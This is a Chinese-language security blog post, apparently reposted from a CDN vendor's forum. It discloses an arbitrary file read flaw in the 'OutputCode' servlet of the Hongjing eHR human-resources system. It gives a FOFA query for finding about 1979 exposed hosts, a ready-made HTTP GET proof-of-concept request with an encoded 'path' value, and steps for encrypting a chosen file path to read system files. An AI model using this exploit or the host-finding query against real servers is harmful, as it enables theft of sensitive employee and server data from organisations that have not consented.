宏景eHR-OutputCode存在任意文件读取漏洞

漏洞描述

宏景eHR是一种企业人力资源管理系统,该漏洞存在于’OutputCode’模块中,该模块未能正确验证用户输入的文件路径参数’path’。由于缺乏充分的输入校验和路径处理,攻击者可以通过构造恶意的’path’参数,读取服务器上的任意文件

fofa

app=”HJSOFT-HCM”

POC

GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Connection: close 

漏洞复现

在fofa中搜索资产,共有1979条数据匹配

image-20240526164424092

访问目标网站抓包构造恶意语句,或者直接在url后拼接payload

image-20240526164513723

对想要读取的文件进行加密

image-20240526165300598

添加进payload语句中image-20240526165505830

尝试其他的系统文件

image-20240526170032803

image-20240526170057382

原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/30738

(0)
优速盾-小U的头像优速盾-小U
上一篇 2025年6月18日 18:42
下一篇 2025年6月18日 23:04

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

优速盾注册领取大礼包www.cdnb.net
/sitemap.xml